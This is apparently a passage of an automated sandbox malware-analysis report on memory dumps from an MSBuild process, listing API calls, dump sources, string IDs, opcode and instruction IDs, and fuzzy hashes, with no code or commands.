                                                                                                                                                      • Instruction Fuzzy Hash: 6E111FB68003498BDB10DFAAC544B8EFBF9AB88224F14842AD419B7210D779A545CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 05DEBC2E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146326029.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5de0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: db5f8091a6a1cd758318cc84446b2c72429aafefd14de4123756440846107913
                                                                                                                                                      • Instruction ID: ceddd1d1f7f5688067171b4e956eedfc81c352c720519868308f528e14bf059d
                                                                                                                                                      • Opcode Fuzzy Hash: db5f8091a6a1cd758318cc84446b2c72429aafefd14de4123756440846107913
                                                                                                                                                      • Instruction Fuzzy Hash: 1D112DB6C003498FDB20DFAAC544A8EFBF5AB88320F10842AD419B7210C779A545CFA1
                                                                                                                                                      APIs
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 05E1A065
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Initialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                                      • Opcode ID: e304bb4dfc8c21b75713724478980b436edddccef1f23568a95c3437511bf939
                                                                                                                                                      • Instruction ID: 62585fd541e49055fb82756f3c2392d94bce08b695e588f98a521e009eeaf4da
                                                                                                                                                      • Opcode Fuzzy Hash: e304bb4dfc8c21b75713724478980b436edddccef1f23568a95c3437511bf939
                                                                                                                                                      • Instruction Fuzzy Hash: 5F1106B58003488FCB20DFA9C545BDEFBF4EF48314F20845AD599A7210C379A544CFA5
                                                                                                                                                      APIs
                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 05E1A065
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Initialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                                      • Opcode ID: 0c42cac49c75ca71ef5d5a65913b0bba89b8f8075d807c3c4b4317472414795b
                                                                                                                                                      • Instruction ID: 1694e957304b0ddbc6a18c1800dd9ce1a257cb47683595040be24c773f2f4c48
                                                                                                                                                      • Opcode Fuzzy Hash: 0c42cac49c75ca71ef5d5a65913b0bba89b8f8075d807c3c4b4317472414795b
                                                                                                                                                      • Instruction Fuzzy Hash: 081145B4900348CFCB20DFAAC545BDEBBF4EB48324F108469D559A7210D379A940CFA5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: \VTm
                                                                                                                                                      • API String ID: 0-628799665
                                                                                                                                                      • Opcode ID: 7db130317c1df961f539d5419deaa4fb311723636275b14caed53d5a09f9341d
                                                                                                                                                      • Instruction ID: 32b20c041674722cbd3592e2d670c0225da9833805ae6cd411d51e719eb0110b
                                                                                                                                                      • Opcode Fuzzy Hash: 7db130317c1df961f539d5419deaa4fb311723636275b14caed53d5a09f9341d
                                                                                                                                                      • Instruction Fuzzy Hash: D7B15D70E002199FDB14CFA9C9857DDBBF2BF8C714F188129E814AB394EB749846CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 121c1a573b3ed42e904b68d8d76232f294a6e93bfd48adbabdb6dd1baf49bc91
                                                                                                                                                      • Instruction ID: 1ff4298e2b3dca9ed346eda7a714e0fe7ff08757a10218793165eafc5e789a8b
                                                                                                                                                      • Opcode Fuzzy Hash: 121c1a573b3ed42e904b68d8d76232f294a6e93bfd48adbabdb6dd1baf49bc91
                                                                                                                                                      • Instruction Fuzzy Hash: D6F29378A002199FCF659FB4D88CA9DBBB5BF48301F5049E9E50AE7365DB349E818F40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Te^q
                                                                                                                                                      • API String ID: 0-671973202
                                                                                                                                                      • Opcode ID: 1a555c56919f0f714f461424652a9bd579aaae355ec4f975bbc19bdc534bc0b2
                                                                                                                                                      • Instruction ID: 1dbce179d41f3d8819aef9ca8d87442cd3d2e78a1db94aae8d1352a20ddd94c0
                                                                                                                                                      • Opcode Fuzzy Hash: 1a555c56919f0f714f461424652a9bd579aaae355ec4f975bbc19bdc534bc0b2
                                                                                                                                                      • Instruction Fuzzy Hash: C0613934F102158FDB54DFA8D998A9EBBF2BF88700F248469E416EB395DB749C41CB80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Te^q
                                                                                                                                                      • API String ID: 0-671973202
                                                                                                                                                      • Opcode ID: 54d6f7b2923e9f7f389213db955399e4dcd5301b8e4b72d4e753d768bd7af46a
                                                                                                                                                      • Instruction ID: e7a8f57d1093fd33be4575ed521cdc8414130e5cb19c6abe89edf156def6fa22
                                                                                                                                                      • Opcode Fuzzy Hash: 54d6f7b2923e9f7f389213db955399e4dcd5301b8e4b72d4e753d768bd7af46a
                                                                                                                                                      • Instruction Fuzzy Hash: 8341CFB1E0434A9FCB11CFA0C8497ADBFB2BF45304F54899AE411EB250EB709986CB80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Te^q
                                                                                                                                                      • API String ID: 0-671973202
                                                                                                                                                      • Opcode ID: 8e50070eda0f066e1f4397ba87dafc3fc96244b82837a43c7794d61e3b703621
                                                                                                                                                      • Instruction ID: 3289387980474a863f8c3da3a34142cf933b9e144e6dc32db83f2dbb2e12916e
                                                                                                                                                      • Opcode Fuzzy Hash: 8e50070eda0f066e1f4397ba87dafc3fc96244b82837a43c7794d61e3b703621
                                                                                                                                                      • Instruction Fuzzy Hash: AD418271E103599BDB10CFA5C8496ADBBB2FF84704F148969E812EB344DB709D86CB80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,[7q
                                                                                                                                                      • API String ID: 0-474804053
                                                                                                                                                      • Opcode ID: ffe3dd34af4eb4d12ccaf109c0be3fe9dc63d6237235590e3ebc5cae0b6c172a
                                                                                                                                                      • Instruction ID: 0ff85612349d5b94f175c45dff2bc93ff9a826aab29e99e859bd2c9fe07a3239
                                                                                                                                                      • Opcode Fuzzy Hash: ffe3dd34af4eb4d12ccaf109c0be3fe9dc63d6237235590e3ebc5cae0b6c172a
                                                                                                                                                      • Instruction Fuzzy Hash: F041AB35A00329DBEB14DFB4C8486ADBBB2FF88704F10842AE906E7254EB759C42CF51
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,[7q
                                                                                                                                                      • API String ID: 0-474804053
                                                                                                                                                      • Opcode ID: 75b9fa538eba059e8b56aa96859c3b6445627f94f76424a5ff3b695529174b51
                                                                                                                                                      • Instruction ID: f0ca91b17040111de53902af12800e8c22998d75537b297e9862ff013e38433e
                                                                                                                                                      • Opcode Fuzzy Hash: 75b9fa538eba059e8b56aa96859c3b6445627f94f76424a5ff3b695529174b51
                                                                                                                                                      • Instruction Fuzzy Hash: 0541CB34E00229DBEB14DFA4C8446ADB7B6FF88704F104469E945EB354EB75ED82CB51
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Te^q
                                                                                                                                                      • API String ID: 0-671973202
                                                                                                                                                      • Opcode ID: 308d7616e61aa8394d36d5de1d6c5b2c0b1f61c4a6627921ff8803cf7341853f
                                                                                                                                                      • Instruction ID: 8cf2247993c153a3161503124d2e13d79b048e6ddc18657c2e9d85f72dfa1108
                                                                                                                                                      • Opcode Fuzzy Hash: 308d7616e61aa8394d36d5de1d6c5b2c0b1f61c4a6627921ff8803cf7341853f
                                                                                                                                                      • Instruction Fuzzy Hash: 0F218030E5031A9BDB54CFA5C45469EBBB6BF85304F64852AE805AF240EBB5D94ACBC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Te^q
                                                                                                                                                      • API String ID: 0-671973202
                                                                                                                                                      • Opcode ID: 7179c1872576cd102fb49b31383192d5bd33044d0f1288003a68f9b22779acd4
                                                                                                                                                      • Instruction ID: a7079bbe2c5eeb3b74e08ae27d5ee23b13bfada405d9325330b556f79439cf8a
                                                                                                                                                      • Opcode Fuzzy Hash: 7179c1872576cd102fb49b31383192d5bd33044d0f1288003a68f9b22779acd4
                                                                                                                                                      • Instruction Fuzzy Hash: F821A130F5031A9BDF58DFA5C4546AEBBB6BF85304F608429E805AF240DBB6D9468B81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: P @
                                                                                                                                                      • API String ID: 0-1889899152
                                                                                                                                                      • Opcode ID: a658ba121beee2599cdf58e5eceb00cb6320c58ebd3593b7d67d6b17928b64e7
                                                                                                                                                      • Instruction ID: daede272afba2556240287d53cc9b15915ed1466dc2c9d355d0b92284bf125b3
                                                                                                                                                      • Opcode Fuzzy Hash: a658ba121beee2599cdf58e5eceb00cb6320c58ebd3593b7d67d6b17928b64e7
                                                                                                                                                      • Instruction Fuzzy Hash: F4018471A043048FDB049F59D8957ABBBA6FB88310F10C439E90D9B399DBB19D45C7A0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LR^q
                                                                                                                                                      • API String ID: 0-2625958711
                                                                                                                                                      • Opcode ID: c2b02ee043e17ee9b434970e62eeb4985c2c9b7b4ef079d1d5e0c20fd0e71fd4
                                                                                                                                                      • Instruction ID: 5bfa33b3cf8cf77b6c8a03f61dfb75ac6693c5e1d0084388c4fe972fceace6da
                                                                                                                                                      • Opcode Fuzzy Hash: c2b02ee043e17ee9b434970e62eeb4985c2c9b7b4ef079d1d5e0c20fd0e71fd4
                                                                                                                                                      • Instruction Fuzzy Hash: E001DB323002169FDB18CA29CC40A7A73AAFFC8700B14856DE4198F294DB70EC02C795
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: P @
                                                                                                                                                      • API String ID: 0-1889899152
                                                                                                                                                      • Opcode ID: f19d6347c344ef0707d748ba90db078fc9ada142f26c7b11b589a72d5ad57074
                                                                                                                                                      • Instruction ID: c70c69154119d8d1f80f65bea27c9db67c17b12fbb95af76f5a335a8af00b3e3
                                                                                                                                                      • Opcode Fuzzy Hash: f19d6347c344ef0707d748ba90db078fc9ada142f26c7b11b589a72d5ad57074
                                                                                                                                                      • Instruction Fuzzy Hash: E8019E70A003008FDB049F59D88576ABBA6FBC8310F10C439E9099B399DBB19C44CBA0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: V
                                                                                                                                                      • API String ID: 0-1342839628
                                                                                                                                                      • Opcode ID: 4814be8182d2123e7c275921cbb3e5cfff1b1ce69e2191eaabcb0253f4a83a81
                                                                                                                                                      • Instruction ID: 73a31a4e2cb94e9fe8cef4ce05ace379faa449d96b7ddb5404a49a83c09232fb
                                                                                                                                                      • Opcode Fuzzy Hash: 4814be8182d2123e7c275921cbb3e5cfff1b1ce69e2191eaabcb0253f4a83a81
                                                                                                                                                      • Instruction Fuzzy Hash: F1E0263170C2C64FD3428B34881484ABFB20F8622471882EFC4D9DB6D3CAA18C8AC784
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b804ab6b94a0723c825dea0e87937df0f3638ce42f0a4f2396030f7f7f0038b9
                                                                                                                                                      • Instruction ID: ffd23fab490f6c04032b3ebfcdb67fdaab56c591133f9958e1700ffb18fc67b0
                                                                                                                                                      • Opcode Fuzzy Hash: b804ab6b94a0723c825dea0e87937df0f3638ce42f0a4f2396030f7f7f0038b9
                                                                                                                                                      • Instruction Fuzzy Hash: 80C2CE78A143189FCB60AFB4D94DA9DBBB6BF48301F1048A9E54AE7314DF348A91DF50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: bdfde2353eb9921857837554c6fc7081ed05a508fb30b449db7dc5484f3d668b
                                                                                                                                                      • Instruction ID: 89e3d4658d39126ef864262fa80b9912d2fd796f71427208975f9261b4ab699c
                                                                                                                                                      • Opcode Fuzzy Hash: bdfde2353eb9921857837554c6fc7081ed05a508fb30b449db7dc5484f3d668b
                                                                                                                                                      • Instruction Fuzzy Hash: 79A2BD78A143199FCB60AFB4D84DA9DBBB6AF48301F1049E9E54AE7310DF348A91DF50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 870d57f12cfb2aa4377bd81694a66acb7bc19ba4a1c7bfdc0228a8987190266f
                                                                                                                                                      • Instruction ID: db1cf8b7e39a3d7f571db20886583f3142090623f0586e8e712c4dc14d310b0d
                                                                                                                                                      • Opcode Fuzzy Hash: 870d57f12cfb2aa4377bd81694a66acb7bc19ba4a1c7bfdc0228a8987190266f
                                                                                                                                                      • Instruction Fuzzy Hash: 72928EB4D00329DFCB64AF64D988A9DBBB6BF48311F1049E9E909A7350DB359E91CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 42c8b7a46349edec5bfd6516db23c0633e8c0a7cbe0a9304c67c54660e58583c
                                                                                                                                                      • Instruction ID: f49c75f9d1f77c44b5b91d79d5958e4411338758eda82acc3f4cab79d9ffe513
                                                                                                                                                      • Opcode Fuzzy Hash: 42c8b7a46349edec5bfd6516db23c0633e8c0a7cbe0a9304c67c54660e58583c
                                                                                                                                                      • Instruction Fuzzy Hash: F7928EB4D00329DFCB64AF64D988A9DBBB6BF48301F1049E9E909A7310DB359E91CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 23f4717a4969914410533e4d913143c284462997b8adb04a3d33f9313e1ee25c
                                                                                                                                                      • Instruction ID: 6b553ceba41116acdc33ac5887da4a70baa2802e2d7dc3be9f01d6719e830b9f
                                                                                                                                                      • Opcode Fuzzy Hash: 23f4717a4969914410533e4d913143c284462997b8adb04a3d33f9313e1ee25c
                                                                                                                                                      • Instruction Fuzzy Hash: 8032E074E14318DFEB50ABB4D859A9DBBB6BF88301F1088A9E50AE7354DF348991CF50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 253259d55b5339f0c513e4127f2103d226a023f91ba8cbe237852ccbdcaf5e56
                                                                                                                                                      • Instruction ID: b6c92424644f87834cf8bfec58b74965022a447176f8792d6ead18179506ab36
                                                                                                                                                      • Opcode Fuzzy Hash: 253259d55b5339f0c513e4127f2103d226a023f91ba8cbe237852ccbdcaf5e56
                                                                                                                                                      • Instruction Fuzzy Hash: FA32E074E10318DFEB54ABB4D859A9DBBB6BF88301F1088A9E50AE7354DF348991CF50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0e0b11a1860894b3dc2c662c3a2b6a8b030f8ed8a4a5686b5c81f22d757cb693
                                                                                                                                                      • Instruction ID: ff0981ed90e08b5187e49a78139713187e2a540726b09760183158114ab390cd
                                                                                                                                                      • Opcode Fuzzy Hash: 0e0b11a1860894b3dc2c662c3a2b6a8b030f8ed8a4a5686b5c81f22d757cb693
                                                                                                                                                      • Instruction Fuzzy Hash: A5121374E103189FCB549BB4D858B9DBBB6BF88200F1088A9E54AEB354EB349D91DF50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 01118bb43cd5534cc0c0df9f3a4e16e8cedf5fbd547e28ee9faa9b9b7d1998a7
                                                                                                                                                      • Instruction ID: 3253a5e3cd160df7213803ee3fa8c4b2a9f8ebce90959197a8f63539dc96057f
                                                                                                                                                      • Opcode Fuzzy Hash: 01118bb43cd5534cc0c0df9f3a4e16e8cedf5fbd547e28ee9faa9b9b7d1998a7
                                                                                                                                                      • Instruction Fuzzy Hash: 8002C775E002149FDF609FB4D888A9DBBB6FF48215F2048A9E90AE7315EB349E41CF51
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e454c15aafde2505bb88702406674071884e11b33f233377b269e9b16f90f472
                                                                                                                                                      • Instruction ID: aeb84c04d403d8557bc1025a26b37b4fc371fad0c1ce70564bcc56357afda55b
                                                                                                                                                      • Opcode Fuzzy Hash: e454c15aafde2505bb88702406674071884e11b33f233377b269e9b16f90f472
                                                                                                                                                      • Instruction Fuzzy Hash: 5F02A374E402199FCB64EFB4D848A9DBBB5BF49305F1048A9E50AEB354EB359E81CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7f5fa3a0df278e547e182b051c37c0919c1cf15a07ee5579ef0693749def405d
                                                                                                                                                      • Instruction ID: 89ef0cd452c0c6e973d88d4cf4d7aa1af701bad269d7cb4423c6be3cb69cdfd8
                                                                                                                                                      • Opcode Fuzzy Hash: 7f5fa3a0df278e547e182b051c37c0919c1cf15a07ee5579ef0693749def405d
                                                                                                                                                      • Instruction Fuzzy Hash: 6DE1D374E143189FDB149FB4D849AADBBB6FF88201F1088A9E80AE7355DF348D958F50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9a5b3d2ecf4a9e803327152eae90a47b867095aa46b57fed88d4b9806f7dae3a
                                                                                                                                                      • Instruction ID: 33feea38458c9f30491eb4d12d35c8c97198331397599882e65ba8c2aa99cb3a
                                                                                                                                                      • Opcode Fuzzy Hash: 9a5b3d2ecf4a9e803327152eae90a47b867095aa46b57fed88d4b9806f7dae3a
                                                                                                                                                      • Instruction Fuzzy Hash: 75D1E5B5A403089FCB54EFB8E88C99EBBB9FF89301B104869E406E7359DB349941CF51
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 44b4d0936fcf5c3b8d2ce2a2444a280c05063c1cee9b2fa41b986928df5ed3d2
                                                                                                                                                      • Instruction ID: 49dcff18ef1e58ddd86ee720d8cf73593f63285074af509d388e7a120f2f94c8
                                                                                                                                                      • Opcode Fuzzy Hash: 44b4d0936fcf5c3b8d2ce2a2444a280c05063c1cee9b2fa41b986928df5ed3d2
                                                                                                                                                      • Instruction Fuzzy Hash: 41C17170E002199FDB14DF78D884A6EBBB6FB88310F208566E416EB355DB35DC42CB81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c24ca8894e4c8454031c4e072f9066c3be5817e3294ac84117da79b8b908e735
                                                                                                                                                      • Instruction ID: 4eae6e496f2503cdb99d3c00b53a5d336ad88e651bf42e5c0b1b966a4aac70f5
                                                                                                                                                      • Opcode Fuzzy Hash: c24ca8894e4c8454031c4e072f9066c3be5817e3294ac84117da79b8b908e735
                                                                                                                                                      • Instruction Fuzzy Hash: 1EE1D374A143189FDB149FB4D849AADBBB6FF88301F1088A9E80AE7354DF349D958F50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
